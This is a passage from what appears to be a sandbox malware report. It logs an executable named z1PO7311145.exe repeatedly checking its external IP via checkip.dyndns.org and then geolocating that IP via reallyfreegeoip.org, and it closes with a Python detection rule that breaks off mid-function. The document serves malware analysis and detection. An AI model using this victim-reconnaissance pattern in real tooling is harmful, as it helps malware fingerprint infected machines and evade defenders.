Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
Oct 7, 2024 15:32:10.420491934 CEST | 320 | IN | HTTP/1.1 200 OK
Date: Mon, 07 Oct 2024 13:32:09 GMT
Content-Type: text/html
Content-Length: 103
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: f68e09b5ca41aa72a69189561720b207
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
Oct 7, 2024 15:32:10.423350096 CEST | 127 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Oct 7, 2024 15:32:10.573785067 CEST | 320 | IN | HTTP/1.1 200 OK
Date: Mon, 07 Oct 2024 13:32:10 GMT
Content-Type: text/html
Content-Length: 103
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: 83edd1acd73ddfbb01d7e71313c0b0fe
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
Oct 7, 2024 15:32:11.255348921 CEST | 127 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Oct 7, 2024 15:32:11.417453051 CEST | 320 | IN | HTTP/1.1 200 OK
Date: Mon, 07 Oct 2024 13:32:11 GMT
Content-Type: text/html
Content-Length: 103
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: 00c422b3e4ff372288802364fcc1a48f
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                    1 | 192.168.2.7 | 49702 | 158.101.44.242 | 80 | 6492 | C:\Users\user\Desktop\z1PO7311145.exe
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    Oct 7, 2024 15:32:12.036933899 CEST | 127 | OUT | GET / HTTP/1.1
                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                    Host: checkip.dyndns.org
                                                                                    Oct 7, 2024 15:32:12.585233927 CEST | 320 | IN | HTTP/1.1 200 OK
                                                                                    Date: Mon, 07 Oct 2024 13:32:12 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 103
                                                                                    Connection: keep-alive
                                                                                    Cache-Control: no-cache
                                                                                    Pragma: no-cache
                                                                                    X-Request-ID: 5e6d0f1195edd27d2c18c5549e37bab0
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                    2 | 192.168.2.7 | 49704 | 158.101.44.242 | 80 | 6492 | C:\Users\user\Desktop\z1PO7311145.exe
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    Oct 7, 2024 15:32:13.190700054 CEST | 127 | OUT | GET / HTTP/1.1
                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                    Host: checkip.dyndns.org
                                                                                    Oct 7, 2024 15:32:13.739020109 CEST | 320 | IN | HTTP/1.1 200 OK
                                                                                    Date: Mon, 07 Oct 2024 13:32:13 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 103
                                                                                    Connection: keep-alive
                                                                                    Cache-Control: no-cache
                                                                                    Pragma: no-cache
                                                                                    X-Request-ID: bc7d8acfaad96689f92be576b2069d74
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                    3 | 192.168.2.7 | 49706 | 158.101.44.242 | 80 | 6492 | C:\Users\user\Desktop\z1PO7311145.exe
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    Oct 7, 2024 15:32:14.336594105 CEST | 127 | OUT | GET / HTTP/1.1
                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                    Host: checkip.dyndns.org
                                                                                    Oct 7, 2024 15:32:14.895538092 CEST | 320 | IN | HTTP/1.1 200 OK
                                                                                    Date: Mon, 07 Oct 2024 13:32:14 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 103
                                                                                    Connection: keep-alive
                                                                                    Cache-Control: no-cache
                                                                                    Pragma: no-cache
                                                                                    X-Request-ID: c08aa67462b5f128f3d6b6c25e9dbe91
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                    4 | 192.168.2.7 | 49708 | 158.101.44.242 | 80 | 6492 | C:\Users\user\Desktop\z1PO7311145.exe
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    Oct 7, 2024 15:32:15.903928041 CEST | 151 | OUT | GET / HTTP/1.1
                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                    Host: checkip.dyndns.org
                                                                                    Connection: Keep-Alive
                                                                                    Oct 7, 2024 15:32:16.472619057 CEST | 320 | IN | HTTP/1.1 200 OK
                                                                                    Date: Mon, 07 Oct 2024 13:32:16 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 103
                                                                                    Connection: keep-alive
                                                                                    Cache-Control: no-cache
                                                                                    Pragma: no-cache
                                                                                    X-Request-ID: 3373d939d9eb039966a1ef7bc245cce7
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                    5 | 192.168.2.7 | 49710 | 158.101.44.242 | 80 | 6492 | C:\Users\user\Desktop\z1PO7311145.exe
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    Oct 7, 2024 15:32:17.095774889 CEST | 151 | OUT | GET / HTTP/1.1
                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                    Host: checkip.dyndns.org
                                                                                    Connection: Keep-Alive
                                                                                    Oct 7, 2024 15:32:17.632886887 CEST | 320 | IN | HTTP/1.1 200 OK
                                                                                    Date: Mon, 07 Oct 2024 13:32:17 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 103
                                                                                    Connection: keep-alive
                                                                                    Cache-Control: no-cache
                                                                                    Pragma: no-cache
                                                                                    X-Request-ID: 41bb95fd0065788b741ad2cf4b77b333
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                    6 | 192.168.2.7 | 49712 | 158.101.44.242 | 80 | 6492 | C:\Users\user\Desktop\z1PO7311145.exe
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    Oct 7, 2024 15:32:18.249037027 CEST | 151 | OUT | GET / HTTP/1.1
                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                    Host: checkip.dyndns.org
                                                                                    Connection: Keep-Alive
                                                                                    Oct 7, 2024 15:32:19.017308950 CEST | 320 | IN | HTTP/1.1 200 OK
                                                                                    Date: Mon, 07 Oct 2024 13:32:18 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 103
                                                                                    Connection: keep-alive
                                                                                    Cache-Control: no-cache
                                                                                    Pragma: no-cache
                                                                                    X-Request-ID: be4b9922eb63d0c2ab41089abfab3b32
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                                                                    Oct 7, 2024 15:32:19.018198013 CEST | 320 | IN | HTTP/1.1 200 OK
                                                                                    Date: Mon, 07 Oct 2024 13:32:18 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 103
                                                                                    Connection: keep-alive
                                                                                    Cache-Control: no-cache
                                                                                    Pragma: no-cache
                                                                                    X-Request-ID: be4b9922eb63d0c2ab41089abfab3b32
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                    7 | 192.168.2.7 | 49715 | 158.101.44.242 | 80 | 6492 | C:\Users\user\Desktop\z1PO7311145.exe
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    Oct 7, 2024 15:32:19.671669960 CEST | 151 | OUT | GET / HTTP/1.1
                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                    Host: checkip.dyndns.org
                                                                                    Connection: Keep-Alive
                                                                                    Oct 7, 2024 15:32:20.217713118 CEST | 320 | IN | HTTP/1.1 200 OK
                                                                                    Date: Mon, 07 Oct 2024 13:32:20 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 103
                                                                                    Connection: keep-alive
                                                                                    Cache-Control: no-cache
                                                                                    Pragma: no-cache
                                                                                    X-Request-ID: db3c6dc9927fdbe91f73b2b51ba446be
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                    0 | 192.168.2.7 | 49700 | 188.114.97.3 | 443 | 6492 | C:\Users\user\Desktop\z1PO7311145.exe
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    2024-10-07 13:32:11 UTC | 84 | OUT | GET /xml/8.46.123.33 HTTP/1.1
                                                                                    Host: reallyfreegeoip.org
                                                                                    Connection: Keep-Alive
                                                                                    2024-10-07 13:32:11 UTC | 712 | IN | HTTP/1.1 200 OK
                                                                                    Date: Mon, 07 Oct 2024 13:32:11 GMT
                                                                                    Content-Type: application/xml
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    access-control-allow-origin: *
                                                                                    vary: Accept-Encoding
                                                                                    Cache-Control: max-age=86400
                                                                                    CF-Cache-Status: HIT
                                                                                    Age: 64266
                                                                                    Last-Modified: Sun, 06 Oct 2024 19:41:05 GMT
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Uv%2Fzm%2FvsCPWZgml5MBW7k2XjelLgFJ6iXJU8UHIjribBc5yEyVlLOcf%2FqigxaCUePE6rwQza%2FhimG8T%2BX0eXC65slqwpSvpThrJApBmNgFaW%2F5QzKut7SSTwddnNbAsqNPSGldFh"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8cee4179f90e7287-EWR
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    2024-10-07 13:32:11 UTC | 340 | IN | Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                                                    Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                                                    2024-10-07 13:32:11 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                    1 | 192.168.2.7 | 49701 | 188.114.97.3 | 443 | 6492 | C:\Users\user\Desktop\z1PO7311145.exe
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    2024-10-07 13:32:11 UTC | 60 | OUT | GET /xml/8.46.123.33 HTTP/1.1
                                                                                    Host: reallyfreegeoip.org
                                                                                    2024-10-07 13:32:12 UTC | 680 | IN | HTTP/1.1 200 OK
                                                                                    Date: Mon, 07 Oct 2024 13:32:11 GMT
                                                                                    Content-Type: application/xml
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    access-control-allow-origin: *
                                                                                    vary: Accept-Encoding
                                                                                    Cache-Control: max-age=86400
                                                                                    CF-Cache-Status: HIT
                                                                                    Age: 64266
                                                                                    Last-Modified: Sun, 06 Oct 2024 19:41:05 GMT
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FWKifVSljXA8ns2kuuLVUvaU1uYm0P0jnuMmUOw0%2BK6N8U3%2BbZ7UUEnRWAQgUPa2WPm9nB0nQmHd4rJiZSDpSaW%2FJ5eDtTy%2FaOuobu5VMvFcvq3jRFSrjc7p6ssFDBYdZmkPgA0X"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8cee417eb839c413-EWR
                                                                                    2024-10-07 13:32:12 UTC | 340 | IN | Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                                                    Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                                                    2024-10-07 13:32:12 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                    2 | 192.168.2.7 | 49703 | 188.114.97.3 | 443 | 6492 | C:\Users\user\Desktop\z1PO7311145.exe
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    2024-10-07 13:32:13 UTC | 84 | OUT | GET /xml/8.46.123.33 HTTP/1.1
                                                                                    Host: reallyfreegeoip.org
                                                                                    Connection: Keep-Alive
                                                                                    2024-10-07 13:32:13 UTC | 678 | IN | HTTP/1.1 200 OK
                                                                                    Date: Mon, 07 Oct 2024 13:32:13 GMT
                                                                                    Content-Type: application/xml
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    access-control-allow-origin: *
                                                                                    vary: Accept-Encoding
                                                                                    Cache-Control: max-age=86400
                                                                                    CF-Cache-Status: HIT
                                                                                    Age: 64268
                                                                                    Last-Modified: Sun, 06 Oct 2024 19:41:05 GMT
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ipacYJd1X8pPIib1tlYXdCxAKVqP4M%2FGhkR%2FPXgybFyuvHeCAZ9Q4cNbUfKkvznbd%2F4sXQXRWRwS3wtKHq6INxRc52DF4jOESEbzkPuHvZGjXFUAqH9S1ebtt2RgNQvH%2FayVDwcT"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8cee4185ffffc34e-EWR
                                                                                    2024-10-07 13:32:13 UTC | 340 | IN | Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                                                    Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                                                    2024-10-07 13:32:13 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0
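
The checkip.dyndns.org sessions (legacy MSIE 6.0 User-Agent, plain HTTP on port 80, roughly one request per second) and the reallyfreegeoip.org sessions (no User-Agent at all, /xml/<the IP just echoed>, chunked XML answer) together are the sample's external-IP and country lookup that the signature list at the top of the report calls out. The Python below is an added example, not part of this Joe Sandbox report and not code from the sample: it shows how a detection rule over proxy or sandbox HTTP logs would tie the two together, decoding the chunked XML body, pulling the IP out of the checkip HTML, and alerting when the same PID geolocates that exact IP within a short window. The record layout, the 10-second window, the host lists and all function names are assumptions of this example; the sample records are constructed from the values shown in the sessions on this page.

```python
import re
from datetime import datetime, timedelta

# Exact User-Agent sent in every checkip.dyndns.org request on this page. No current browser
# sends an IE6 / .NET CLR 1.0 string, so the UA alone is already a usable indicator.
LEGACY_UA = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)"
IP_CHECK_HOSTS = {"checkip.dyndns.org"}   # assumption: extend with other IP-echo services in use
GEO_HOST = "reallyfreegeoip.org"
GEO_PATH = re.compile(r"^/xml/(\d{1,3}(?:\.\d{1,3}){3})$")
IP_BODY = re.compile(r"Current IP Address:\s*(\d{1,3}(?:\.\d{1,3}){3})")
COUNTRY = re.compile(r"<CountryCode>([A-Z]{2})</CountryCode>")


def dechunk(raw: bytes) -> bytes:
    """Decode an HTTP/1.1 chunked body: hex size, CRLF, data, CRLF, ..., '0' CRLF CRLF."""
    out, pos = bytearray(), 0
    while True:
        end = raw.index(b"\r\n", pos)
        size = int(raw[pos:end].split(b";")[0], 16)   # drop any chunk extension after ';'
        pos = end + 2
        if size == 0:
            return bytes(out)
        out += raw[pos:pos + size]
        pos += size + 2                                # skip the CRLF that ends the chunk


def chunk(payload: bytes) -> bytes:
    """Inverse of dechunk; used only to build the constructed sample below."""
    return b"%x\r\n%s\r\n0\r\n\r\n" % (len(payload), payload)


# Constructed bodies, shaped like the ones in the sessions on this page (the report truncates
# the real XML after <Latitude>, so the tail here is an assumption).
IP_HTML = (b"<html><head><title>Current IP Check</title></head>"
           b"<body>Current IP Address: 8.46.123.33</body></html>\r\n")
GEO_XML = (b"<Response>\n\t<IP>8.46.123.33</IP>\n\t<CountryCode>US</CountryCode>\n"
           b"\t<CountryName>United States</CountryName>\n\t<TimeZone>America/Chicago</TimeZone>\n"
           b"</Response>\n")

# Constructed log: (UTC timestamp, pid, host, dst port, request line, user-agent, response body).
# Values come from the sessions above; the tuple layout is ours, not Joe Sandbox's export format.
SAMPLE = [
    ("2024-10-07 13:32:11.255", 6492, "checkip.dyndns.org", 80, "GET / HTTP/1.1", LEGACY_UA, IP_HTML),
    ("2024-10-07 13:32:11.600", 6492, GEO_HOST, 443, "GET /xml/8.46.123.33 HTTP/1.1", None, chunk(GEO_XML)),
    ("2024-10-07 13:32:12.036", 6492, "checkip.dyndns.org", 80, "GET / HTTP/1.1", LEGACY_UA, IP_HTML),
    ("2024-10-07 13:32:12.500", 6492, GEO_HOST, 443, "GET /xml/8.46.123.33 HTTP/1.1", None, chunk(GEO_XML)),
    # benign control (constructed): a browser with a current UA fetching an unrelated site
    ("2024-10-07 13:32:13.000", 4120, "www.example.com", 443, "GET / HTTP/1.1",
     "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Firefox/130.0", b"<html>ok</html>"),
]


def parse_ts(s: str) -> datetime:
    return datetime.strptime(s, "%Y-%m-%d %H:%M:%S.%f")


def correlate(records, window_s: int = 10):
    """Alert on (external-IP echo) followed by (geolocation of that same IP) from one PID.

    Each alert records the IP, the country the geo service returned, both timestamps, and
    whether the two fingerprints seen on this page (legacy UA on the IP check, no UA on the
    geo request) were present, so the analyst can see how much of the pattern matched.
    """
    ip_checks = []            # (time, pid, echoed ip, legacy-UA flag)
    alerts = []
    for ts, pid, host, _port, req, ua, body in sorted(records, key=lambda r: r[0]):
        t = parse_ts(ts)
        path = req.split()[1]
        if host in IP_CHECK_HOSTS:
            m = IP_BODY.search(body.decode("utf-8", "replace"))
            ip_checks.append((t, pid, m.group(1) if m else None, ua == LEGACY_UA))
            continue
        if host == GEO_HOST and (m := GEO_PATH.match(path)):
            ip = m.group(1)
            for t0, pid0, ip0, legacy in reversed(ip_checks):   # newest matching check wins
                if pid0 == pid and ip0 == ip and t - t0 <= timedelta(seconds=window_s):
                    c = COUNTRY.search(dechunk(body).decode("utf-8", "replace"))
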